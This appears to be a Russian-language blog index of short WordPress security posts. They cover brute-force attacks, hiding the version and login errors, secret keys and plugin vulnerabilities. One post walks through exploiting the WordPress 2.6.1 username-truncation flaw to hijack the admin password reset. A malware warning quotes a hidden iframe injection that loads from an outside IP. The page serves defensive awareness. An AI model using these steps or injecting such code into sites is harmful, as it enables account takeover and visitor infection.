Безопасность
Обнаружен веб-сервис, позволяющий автоматизировать процесс взлома паролей WordPress
Хакеры разработали схему распределенного взлома паролей администраторов к аккаунтам WordPress, применение которой не сулит ничего хорошего тем блогам, чьи владельцы используют небезопасные пароли. PHP-скрипты, расположенные на виртуальном сервере, запускают на целевые сайты брутфорс-атаки, позволяя одновременно подбирать пароли сразу ко многим ресурсам. Результаты таких атак записываются в специальную базу данных. SANS Internet Storm Centre отмечает, что читать далее ..
Скрываем версию WordPress
Для повышения безопасности блога, часто рекомендуют отключить отображение версии WordPress. Инструкций как это сделать, огромное множество и все они могут использовать разные методы для отключения отображения версии, но самый просто и правильный вариант, это добавить в файл functions.php который находится в папке шаблона вашего блога, следующую строчку: remove_action('wp_head', 'wp_generator'); Эта строчка отключает отображение версии WordPress, читать далее ..
Скрываем сообщение о ошибке при логине.
Дабы усложнить перебор паролей к вашему WordPress-блогу, можно попросить его не показывать сообщения об ошибке при попытках неправильного входа в блог, таким образом злоумышленник не увидит в чем суть проблемы, несуществующий пользователь или неправильный пароль. Для этого, необходимо отредактировать файл functions.php и вставить следующую строчку: add_filter('login_errors',create_function('$a', "return null;"));
Защита от перебора паролей в WordPress
Для того, чтобы обезопасить свой блог, от взлома путем перебора паролей, необходимо установить ограничение количества неправильных логинов, в этом случае бот или человек, который задумает подобрать пароль к Вашему блогу, после определенного количества неправильных логинов, будет забанен на определенное время. Сделать это можно очень легко, достаточно просто скачать и установить WordPress плагин Limit Login Attempts. читать далее ..
Уязвимости в плагинах Media Holder и e-Commerce
Найдены уязвимости в WordPress-плагинах Media Holder и E-Commerce. На обе уязвимости уже выпущены эксплоиты, которые могут использоваться для нарушения безопасности Вашего блога. Плагин Media Holder предназначен для размещения в блоге различных медиа-данных, видео, аудио и тп. Плагин e-Commerce используется для создания интернет-магазина на основе вашего WordPress-блога. Уязвимость в плагине WordPress Media Holder связана с ошибкой читать далее ..
Уязвимость усечения данных в SQL WordPress 2.6.1
Найдена новая уязвимость в WordPress 2.6.1 которая заключается в ошибке усечения данных в базе SQL. Идем по ссылке server.com/wp-login.php?action=register Регистрируемся как пользователь "admin x" и Ваш email Логин выглядит как admin[55 пробелов]х После регистрации дубликата логина администратора, идем по ссылке восстановления пароля: server.com/wp-login.php?action=lostpassword В форме восстановления пароля вводим email на который регистрировали дубликат логина администратора. читать далее ..
Секретные ключи в WordPress 2.6
Продолжая тему о уязвимости секретного ключа в файле конфигурации WordPress, хочу обратить ваше внимание на то, что в новой версии WordPress 2.6, кроме строчки “SECRET_KEY“ есть еще две, на которые также необходимо обращать внимание при установке или обновлении WordPress блога. Строчки эти выглядят вот так: define('AUTH_KEY', 'впишите сюда уникальную фразу'); // Измените на уникальную фразу. читать далее ..
Внимание вирус!
Вчера на одном из сайтов заказчиков, был обнаружен код, который определяется Google как вирусный код, все сайты которые содержат эту строчку, попадают сразу в категорию опасных сайтов, поэтому будьте внимательны и проверьте файлы своего сайта и посты, на наличие подобного кода. <!-- Traffic Statistics --> <iframe src=хттп://61.155.8.157/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics --> читать далее ..
WordPress 2.6 – еще больше безопасности
Вышла новая версия лучшего движка для блогов - WordPress 2.6. В новой версии исправлено очень много ошибок и уязвимостей, а также проделано много работы для повышения безопасности блога. Теперь после установки WordPress на новый блог, по умолчанию протокол удаленной работы с блогом XML-RPC отключен, до тех пор, пока администратор блога не активирует его в настройках. читать далее ..
Уязвимость секретного ключа в wordpress 2.5
Очень важно при обновлении или установке WordPress обратить внимание на параметр "SECRET_KEY", с этим параметром связана безопасность паролей в вашем блоге. В новых версиях WordPress этот ключ стали использовать для усиления алгоритма криптования паролей md5, поэтому очень важно иметь в качестве этого параметра какую-то длинную строчку с различными символами, дабы усложнить процесс расшифровки вашего пароля, читать далее ..
